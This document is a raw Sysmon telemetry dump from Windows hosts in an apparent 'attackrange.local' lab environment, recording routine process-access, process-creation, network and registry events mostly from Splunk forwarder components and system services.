07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.879{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.401{466BC892-F36A-60EB-FE7C-00000000CF01}95249620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.180{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:48.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57193-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:51.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67638ABEBA973B4BB7051542F8D2896,SHA256=F5BD033356C50EA9C276A6CA541E57E7882157BD7E094811476C85DD38EF8B53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.763{466BC892-F36B-60EB-007D-00000000CF01}77368652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.547{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.547{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.548{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:43.204{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-17553-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 13241300x8000000000000000806582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:52.485{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x14439196) 23542300x8000000000000000806581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:52.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6365596455D363E7FB67F956DF672FB,SHA256=29965BBE984E79AEBA39FAF0B69DDF972FAA6C4F93A69B6B2CE758B275F27CE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.931{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 